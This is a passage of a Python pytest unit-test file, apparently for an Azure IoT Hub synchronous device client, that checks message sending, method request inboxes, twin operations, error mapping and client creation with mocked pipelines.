client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
iothub_pipeline_manual_cb,
message,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=iothub_pipeline_manual_cb.send_message,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.send_message(message)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it(
"Wraps 'message' input parameter in a Message object if it is not a Message object"
)
@pytest.mark.parametrize(
"message_input",
[
pytest.param("message", id="String input"),
pytest.param(222, id="Integer input"),
pytest.param(object(), id="Object input"),
pytest.param(None, id="None input"),
pytest.param([1, "str"], id="List input"),
pytest.param({"a": 2}, id="Dictionary input"),
],
)
def test_wraps_data_in_message_and_calls_pipeline_send_message(
self, client, iothub_pipeline, message_input
):
client.send_message(message_input)
assert iothub_pipeline.send_message.call_count == 1
sent_message = iothub_pipeline.send_message.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == message_input
class SharedClientReceiveMethodRequestTests(object):
@pytest.mark.it("Implicitly enables methods feature if not already enabled")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_enables_methods_only_if_not_already_enabled(
self, mocker, client, iothub_pipeline, method_name
):
mocker.patch.object(SyncClientInbox, "get") # patch this receive_method_request won't block
        # Verify the methods feature gets enabled if it is not already enabled
iothub_pipeline.feature_enabled.__getitem__.return_value = (
False
) # Method Requests will appear disabled
client.receive_method_request(method_name)
assert iothub_pipeline.enable_feature.call_count == 1
assert iothub_pipeline.enable_feature.call_args[0][0] == constant.METHODS
iothub_pipeline.enable_feature.reset_mock()
        # Verify the methods feature is not re-enabled if already enabled
iothub_pipeline.feature_enabled.__getitem__.return_value = (
True
        )  # Method Requests will appear enabled
client.receive_method_request(method_name)
assert iothub_pipeline.enable_feature.call_count == 0
@pytest.mark.it(
"Returns a MethodRequest from the generic method inbox, if available, when called without method name"
)
def test_called_without_method_name_returns_method_request_from_generic_method_inbox(
self, mocker, client
):
request = MethodRequest(request_id="1", name="some_method", payload={"key": "value"})
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = request
manager_get_inbox_mock = mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
received_request = client.receive_method_request()
assert manager_get_inbox_mock.call_count == 1
assert manager_get_inbox_mock.call_args == mocker.call(None)
assert inbox_mock.get.call_count == 1
        assert received_request is request
@pytest.mark.it(
"Returns MethodRequest from the corresponding method inbox, if available, when called with a method name"
)
def test_called_with_method_name_returns_method_request_from_named_method_inbox(
self, mocker, client
):
method_name = "some_method"
request = MethodRequest(request_id="1", name=method_name, payload={"key": "value"})
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = request
manager_get_inbox_mock = mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
received_request = client.receive_method_request(method_name)
assert manager_get_inbox_mock.call_count == 1
assert manager_get_inbox_mock.call_args == mocker.call(method_name)
assert inbox_mock.get.call_count == 1
        assert received_request is request
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_method_request_can_be_called_in_mode(
self, mocker, client, block, timeout, method_name
):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_receive_method_request_default_mode(self, mocker, client, method_name):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
client.receive_method_request(method_name=method_name)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a method request is available, in blocking mode")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_no_method_request_in_inbox_blocking_mode(self, client, method_name):
request = MethodRequest(request_id="1", name=method_name, payload={"key": "value"})
inbox = client._inbox_manager.get_method_request_inbox(method_name)
assert inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
inbox._put(request)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_request = client.receive_method_request(method_name, block=True)
assert received_request is request
# This proves that the blocking happens because 'received_request' can't be
# 'request' until after a 10 millisecond delay on the insert. But because the
# 'received_request' IS 'request', it means that client.receive_method_request
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_times_out_waiting_for_message_blocking_mode(self, client, method_name):
result = client.receive_method_request(method_name, block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no messages, in nonblocking mode")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_no_message_in_inbox_nonblocking_mode(self, client, method_name):
result = client.receive_method_request(method_name, block=False)
assert result is None
class SharedClientSendMethodResponseTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'send_method_response' pipeline operation")
def test_send_method_response_calls_pipeline(self, client, iothub_pipeline, method_response):
client.send_method_response(method_response)
assert iothub_pipeline.send_method_response.call_count == 1
assert iothub_pipeline.send_method_response.call_args[0][0] is method_response
@pytest.mark.it(
"Waits for the completion of the 'send_method_response' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, iothub_pipeline_manual_cb, method_response
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=iothub_pipeline_manual_cb.send_method_response
)
client_manual_cb.send_method_response(method_response)
@pytest.mark.it(
"Raises a client error if the `send_method_response` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
iothub_pipeline_manual_cb,
method_response,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=iothub_pipeline_manual_cb.send_method_response,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.send_method_response(method_response)
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientGetTwinTests(WaitsForEventCompletion):
@pytest.fixture
def patch_get_twin_to_return_fake_twin(self, fake_twin, mocker, iothub_pipeline):
def immediate_callback(callback):
callback(twin=fake_twin)
mocker.patch.object(iothub_pipeline, "get_twin", side_effect=immediate_callback)
@pytest.mark.it("Implicitly enables twin messaging feature if not already enabled")
def test_enables_twin_only_if_not_already_enabled(
self, mocker, client, iothub_pipeline, patch_get_twin_to_return_fake_twin, fake_twin
):
# Verify twin enabled if not enabled
iothub_pipeline.feature_enabled.__getitem__.return_value = (
False
) # twin will appear disabled
client.get_twin()
assert iothub_pipeline.enable_feature.call_count == 1
assert iothub_pipeline.enable_feature.call_args[0][0] == constant.TWIN
iothub_pipeline.enable_feature.reset_mock()
# Verify twin not enabled if already enabled
iothub_pipeline.feature_enabled.__getitem__.return_value = True # twin will appear enabled
client.get_twin()
assert iothub_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Begins a 'get_twin' pipeline operation")
def test_get_twin_calls_pipeline(self, client, iothub_pipeline):
client.get_twin()
assert iothub_pipeline.get_twin.call_count == 1
@pytest.mark.it(
"Waits for the completion of the 'get_twin' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, iothub_pipeline_manual_cb, fake_twin
):
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=iothub_pipeline_manual_cb.get_twin,
kwargs={"twin": fake_twin},
)
client_manual_cb.get_twin()
@pytest.mark.it(
"Raises a client error if the `get_twin` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, iothub_pipeline_manual_cb, pipeline_error, client_error
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=iothub_pipeline_manual_cb.get_twin,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.get_twin()
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it("Returns the twin that the pipeline returned")
def test_verifies_twin_returned(
self, mocker, client_manual_cb, iothub_pipeline_manual_cb, fake_twin
):
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=iothub_pipeline_manual_cb.get_twin,
kwargs={"twin": fake_twin},
)
returned_twin = client_manual_cb.get_twin()
assert returned_twin == fake_twin
class SharedClientPatchTwinReportedPropertiesTests(WaitsForEventCompletion):
@pytest.mark.it("Implicitly enables twin messaging feature if not already enabled")
def test_enables_twin_only_if_not_already_enabled(
self, mocker, client, iothub_pipeline, twin_patch_reported
):
        # patch this so patch_twin_reported_properties won't block
def immediate_callback(patch, callback):
callback()
mocker.patch.object(
iothub_pipeline, "patch_twin_reported_properties", side_effect=immediate_callback
)
# Verify twin enabled if not enabled
iothub_pipeline.feature_enabled.__getitem__.return_value = (
False
) # twin will appear disabled
client.patch_twin_reported_properties(twin_patch_reported)
assert iothub_pipeline.enable_feature.call_count == 1
assert iothub_pipeline.enable_feature.call_args[0][0] == constant.TWIN
iothub_pipeline.enable_feature.reset_mock()
# Verify twin not enabled if already enabled
iothub_pipeline.feature_enabled.__getitem__.return_value = True # twin will appear enabled
client.patch_twin_reported_properties(twin_patch_reported)
assert iothub_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Begins a 'patch_twin_reported_properties' pipeline operation")
def test_patch_twin_reported_properties_calls_pipeline(
self, client, iothub_pipeline, twin_patch_reported
):
client.patch_twin_reported_properties(twin_patch_reported)
assert iothub_pipeline.patch_twin_reported_properties.call_count == 1
assert (
iothub_pipeline.patch_twin_reported_properties.call_args[1]["patch"]
is twin_patch_reported
)
@pytest.mark.it(
"Waits for the completion of the 'patch_twin_reported_properties' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, iothub_pipeline_manual_cb, twin_patch_reported
):
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=iothub_pipeline_manual_cb.patch_twin_reported_properties,
)
client_manual_cb.patch_twin_reported_properties(twin_patch_reported)
@pytest.mark.it(
"Raises a client error if the `patch_twin_reported_properties` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
iothub_pipeline_manual_cb,
twin_patch_reported,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=iothub_pipeline_manual_cb.patch_twin_reported_properties,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.patch_twin_reported_properties(twin_patch_reported)
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientReceiveTwinDesiredPropertiesPatchTests(object):
@pytest.mark.it(
"Implicitly enables Twin desired properties patch feature if not already enabled"
)
def test_enables_twin_patches_only_if_not_already_enabled(
self, mocker, client, iothub_pipeline
):
mocker.patch.object(
SyncClientInbox, "get"
) # patch this so receive_twin_desired_properties_patch won't block
# Verify twin patches enabled if not enabled
iothub_pipeline.feature_enabled.__getitem__.return_value = (
False
) # twin patches will appear disabled
client.receive_twin_desired_properties_patch()
assert iothub_pipeline.enable_feature.call_count == 1
assert iothub_pipeline.enable_feature.call_args[0][0] == constant.TWIN_PATCHES
iothub_pipeline.enable_feature.reset_mock()
# Verify twin patches not enabled if already enabled
        iothub_pipeline.feature_enabled.__getitem__.return_value = True  # twin patches will appear enabled
client.receive_twin_desired_properties_patch()
assert iothub_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Returns a patch from the twin patch inbox, if available")
def test_returns_message_from_twin_patch_inbox(self, mocker, client, twin_patch_desired):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = twin_patch_desired
manager_get_inbox_mock = mocker.patch.object(
client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock
)
received_patch = client.receive_twin_desired_properties_patch()
assert manager_get_inbox_mock.call_count == 1
assert inbox_mock.get.call_count == 1
assert received_patch is twin_patch_desired
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_can_be_called_in_mode(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
def test_default_mode(self, mocker, client):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
client.receive_twin_desired_properties_patch()
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a patch is available, in blocking mode")
def test_no_message_in_inbox_blocking_mode(self, client, twin_patch_desired):
twin_patch_inbox = client._inbox_manager.get_twin_patch_inbox()
assert twin_patch_inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
twin_patch_inbox._put(twin_patch_desired)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_patch = client.receive_twin_desired_properties_patch(block=True)
assert received_patch is twin_patch_desired
# This proves that the blocking happens because 'received_patch' can't be
# 'twin_patch_desired' until after a 10 millisecond delay on the insert. But because the
# 'received_patch' IS 'twin_patch_desired', it means that client.receive_twin_desired_properties_patch
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
def test_times_out_waiting_for_message_blocking_mode(self, client):
result = client.receive_twin_desired_properties_patch(block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no patches, in nonblocking mode")
def test_no_message_in_inbox_nonblocking_mode(self, client):
result = client.receive_twin_desired_properties_patch(block=False)
assert result is None
################
# DEVICE TESTS #
################
class IoTHubDeviceClientTestsConfig(object):
@pytest.fixture
def client_class(self):
return IoTHubDeviceClient
@pytest.fixture
def client(self, iothub_pipeline, http_pipeline):
"""This client automatically resolves callbacks sent to the pipeline.
It should be used for the majority of tests.
"""
return IoTHubDeviceClient(iothub_pipeline, http_pipeline)
@pytest.fixture
def client_manual_cb(self, iothub_pipeline_manual_cb, http_pipeline_manual_cb):
"""This client requires manual triggering of the callbacks sent to the pipeline.
        It should only be used for tests where manual control of a callback is required.
"""
return IoTHubDeviceClient(iothub_pipeline_manual_cb, http_pipeline_manual_cb)
@pytest.fixture
def connection_string(self, device_connection_string):
"""This fixture is parametrized to provie all valid device connection strings.
See client_fixtures.py
"""
return device_connection_string
@pytest.fixture
def sas_token_string(self, device_sas_token_string):
return device_sas_token_string
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - Instantiation")
class TestIoTHubDeviceClientInstantiation(
IoTHubDeviceClientTestsConfig, SharedClientInstantiationTests
):
@pytest.mark.it("Sets on_c2d_message_received handler in the IoTHubPipeline")
def test_sets_on_c2d_message_received_handler_in_pipeline(
self, client_class, iothub_pipeline, http_pipeline
):
client = client_class(iothub_pipeline, http_pipeline)
assert client._iothub_pipeline.on_c2d_message_received is not None
assert (
client._iothub_pipeline.on_c2d_message_received
== client._inbox_manager.route_c2d_message
)
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_connection_string()")
class TestIoTHubDeviceClientCreateFromConnectionString(
IoTHubDeviceClientTestsConfig,
SharedClientCreateFromConnectionStringTests,
ConfigurationSharedClientCreateFromConnectionStringTests,
):
pass
@pytest.mark.describe(
"IoTHubDeviceClient (Synchronous) - .create_from_symmetric_key() -- Configuration"
)
class TestConfigurationIoTHubDeviceClientCreateFromSymmetricKey(IoTHubDeviceClientTestsConfig):
@pytest.mark.it("Sets all configuration options to default when no user configuration provided")
def test_pipeline_configuration_defaults(
self,
mocker,
mock_pipeline_init,
client_class,
symmetric_key,
hostname_fixture,
device_id_fixture,
):
mocker.patch("azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider")
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig",
wraps=config.IoTHubPipelineConfig,
)
client_class.create_from_symmetric_key(
symmetric_key=symmetric_key, hostname=hostname_fixture, device_id=device_id_fixture
)
assert mock_config_init.call_count == 1
assert mock_config_init.call_args == mocker.call()
assert mock_pipeline_init.call_args[0][1].blob_upload is True
assert mock_pipeline_init.call_args[0][1].method_invoke is False
assert mock_pipeline_init.call_args[0][1].websockets is False
assert mock_pipeline_init.call_args[0][1].product_info == ""
@pytest.mark.it("Sets all valid configuration options to the user supplied values")
@pytest.mark.parametrize(
"websockets, product_info",
[
pytest.param((None, None), (None, None), id=" Setting to None"),
pytest.param(
(True, True),
("__fake_product_info__", "__fake_product_info__"),
id=" Expected Values",
),
],
)
def test_pipeline_configuration(
self,
mocker,
mock_pipeline_init,
client_class,
symmetric_key,
hostname_fixture,
device_id_fixture,
websockets,
product_info,
):
mocker.patch("azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider")
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig",
wraps=config.IoTHubPipelineConfig,
)
kwargs = {"websockets": websockets[0], "product_info": product_info[0]}
client_class.create_from_symmetric_key(
symmetric_key=symmetric_key,
hostname=hostname_fixture,
device_id=device_id_fixture,
**kwargs
)
assert mock_config_init.call_count == 1
assert mock_config_init.call_args == mocker.call(
websockets=websockets[0], product_info=product_info[0]
)
assert mock_pipeline_init.call_args[0][1].websockets == websockets[1]
assert mock_pipeline_init.call_args[0][1].product_info == product_info[1]
@pytest.mark.it("Throws if invalid configuration option is provided")
def test_pipeline_configuration_fails_with_bad_option(
self,
mocker,
mock_pipeline_init,
client_class,
symmetric_key,
hostname_fixture,
device_id_fixture,
):
mocker.patch("azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider")
kwargs = {"bad_option": "__fake_parameter__"}
with pytest.raises(TypeError):
client_class.create_from_symmetric_key(
symmetric_key=symmetric_key,
hostname=hostname_fixture,
device_id=device_id_fixture,
**kwargs
)
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_symmetric_key()")
class TestIoTHubDeviceClientCreateFromSymmetricKey(IoTHubDeviceClientTestsConfig):
@pytest.mark.it(
"Uses the symmetric key and CA certificate combination to create a SymmetricKeyAuthenticationProvider"
)
def test_auth_provider_creation(
self, mocker, client_class, symmetric_key, hostname_fixture, device_id_fixture
):
mock_auth_init = mocker.patch(
"azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider"
)
client_class.create_from_symmetric_key(
symmetric_key=symmetric_key, hostname=hostname_fixture, device_id=device_id_fixture
)
assert mock_auth_init.call_count == 1
assert mock_auth_init.call_args == mocker.call(
hostname=hostname_fixture,
device_id=device_id_fixture,
module_id=None,
shared_access_key=symmetric_key,
)
@pytest.mark.it("Uses the SymmetricKeyAuthenticationProvider to create an IoTHubPipeline")
def test_pipeline_creation(
self,
mocker,
client_class,
symmetric_key,
hostname_fixture,
device_id_fixture,
mock_pipeline_init,
):
mock_auth = mocker.patch(
"azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider"
).return_value
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig"
)
client_class.create_from_symmetric_key(
symmetric_key=symmetric_key, hostname=hostname_fixture, device_id=device_id_fixture
)
assert mock_pipeline_init.call_count == 1
assert mock_pipeline_init.call_args == mocker.call(mock_auth, mock_config_init.return_value)
@pytest.mark.it("Uses the IoTHubPipeline to instantiate the client")
def test_client_instantiation(
self, mocker, client_class, symmetric_key, hostname_fixture, device_id_fixture
):
mock_pipeline = mocker.patch("azure.iot.device.iothub.pipeline.IoTHubPipeline").return_value
mock_pipeline_http = mocker.patch(
"azure.iot.device.iothub.pipeline.HTTPPipeline"
).return_value
spy_init = mocker.spy(client_class, "__init__")
client_class.create_from_symmetric_key(
symmetric_key=symmetric_key, hostname=hostname_fixture, device_id=device_id_fixture
)
assert spy_init.call_count == 1
assert spy_init.call_args == mocker.call(mocker.ANY, mock_pipeline, mock_pipeline_http)
@pytest.mark.it("Returns the instantiated client")
def test_returns_client(self, client_class, symmetric_key, hostname_fixture, device_id_fixture):
client = client_class.create_from_symmetric_key(
symmetric_key=symmetric_key, hostname=hostname_fixture, device_id=device_id_fixture
)
assert isinstance(client, client_class)
@pytest.mark.describe(
"IoTHubDeviceClient (Synchronous) - .create_from_x509_certificate() -- Configuration"
)
class TestConfigurationIoTHubDeviceClientCreateFromX509Certificate(IoTHubDeviceClientTestsConfig):
hostname = "durmstranginstitute.farend"
device_id = "MySnitch"
@pytest.mark.it("Sets all configuration options to default when no user configuration provided")
def test_pipeline_configuration_defaults(self, mocker, mock_pipeline_init, client_class, x509):
mocker.patch("azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider")
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig",
wraps=config.IoTHubPipelineConfig,
)
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id
)
assert mock_config_init.call_count == 1
assert mock_config_init.call_args == mocker.call()
assert mock_pipeline_init.call_args[0][1].blob_upload is True
assert mock_pipeline_init.call_args[0][1].method_invoke is False
assert mock_pipeline_init.call_args[0][1].websockets is False
assert mock_pipeline_init.call_args[0][1].product_info == ""
@pytest.mark.it("Sets all valid configuration options to the user supplied values")
@pytest.mark.parametrize(
"websockets, product_info",
[
pytest.param((None, None), (None, None), id=" Setting to None"),
pytest.param(
(True, True),
("__fake_product_info__", "__fake_product_info__"),
id=" Expected Values",
),
],
)
def test_pipeline_configuration(
self, mocker, mock_pipeline_init, client_class, x509, websockets, product_info
):
mocker.patch("azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider")
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig",
wraps=config.IoTHubPipelineConfig,
)
kwargs = {"websockets": websockets[0], "product_info": product_info[0]}
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id, **kwargs
)
assert mock_config_init.call_count == 1
assert mock_config_init.call_args == mocker.call(
websockets=websockets[0], product_info=product_info[0]
)
assert mock_pipeline_init.call_args[0][1].websockets == websockets[1]
assert mock_pipeline_init.call_args[0][1].product_info == product_info[1]
@pytest.mark.it("Throws if invalid configuration option is provided")
def test_pipeline_configuration_fails_with_bad_option(
self, mocker, mock_pipeline_init, client_class, x509
):
mocker.patch("azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider")
kwargs = {"bad_option": "__fake_parameter__"}
with pytest.raises(TypeError):
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id, **kwargs
)
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_x509_certificate()")
class TestIoTHubDeviceClientCreateFromX509Certificate(IoTHubDeviceClientTestsConfig):
hostname = "durmstranginstitute.farend"
device_id = "MySnitch"
@pytest.mark.it("Uses the provided arguments to create a X509AuthenticationProvider")
def test_auth_provider_creation(self, mocker, client_class, x509):
mock_auth_init = mocker.patch("azure.iot.device.iothub.auth.X509AuthenticationProvider")
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id
)
assert mock_auth_init.call_count == 1
assert mock_auth_init.call_args == mocker.call(
x509=x509, hostname=self.hostname, device_id=self.device_id
)
@pytest.mark.it("Uses the X509AuthenticationProvider to create an IoTHubPipeline")
def test_pipeline_creation(self, mocker, client_class, x509, mock_pipeline_init):
mock_auth = mocker.patch(
"azure.iot.device.iothub.auth.X509AuthenticationProvider"
).return_value
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig"
)
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id
)
assert mock_pipeline_init.call_count == 1
assert mock_pipeline_init.call_args == mocker.call(mock_auth, mock_config_init.return_value)
@pytest.mark.it("Uses the IoTHubPipeline to instantiate the client")
def test_client_instantiation(self, mocker, client_class, x509):
mock_pipeline = mocker.patch("azure.iot.device.iothub.pipeline.IoTHubPipeline").return_value
mock_pipeline_http = mocker.patch(
"azure.iot.device.iothub.pipeline.HTTPPipeline"
).return_value
spy_init = mocker.spy(client_class, "__init__")
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id
)
assert spy_init.call_count == 1
assert spy_init.call_args == mocker.call(mocker.ANY, mock_pipeline, mock_pipeline_http)
@pytest.mark.it("Returns the instantiated client")
def test_returns_client(self, mocker, client_class, x509):
client = client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id
)
assert isinstance(client, client_class)
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .connect()")
class TestIoTHubDeviceClientConnect(IoTHubDeviceClientTestsConfig, SharedClientConnectTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .disconnect()")
class TestIoTHubDeviceClientDisconnect(IoTHubDeviceClientTestsConfig, SharedClientDisconnectTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - EVENT: Disconnect")
class TestIoTHubDeviceClientDisconnectEvent(
IoTHubDeviceClientTestsConfig, SharedClientDisconnectEventTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .send_message()")
class TestIoTHubDeviceClientSendD2CMessage(
IoTHubDeviceClientTestsConfig, SharedClientSendD2CMessageTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .receive_message()")
class TestIoTHubDeviceClientReceiveC2DMessage(IoTHubDeviceClientTestsConfig):
@pytest.mark.it("Implicitly enables C2D messaging feature if not already enabled")
def test_enables_c2d_messaging_only_if_not_already_enabled(
self, mocker, client, iothub_pipeline
):
mocker.patch.object(SyncClientInbox, "get") # patch this so receive_message won't block
# Verify C2D Messaging enabled if not enabled
iothub_pipeline.feature_enabled.__getitem__.return_value = False # C2D will appear disabled
client.receive_message()
assert iothub_pipeline.enable_feature.call_count == 1
assert iothub_pipeline.enable_feature.call_args[0][0] == constant.C2D_MSG
iothub_pipeline.enable_feature.reset_mock()
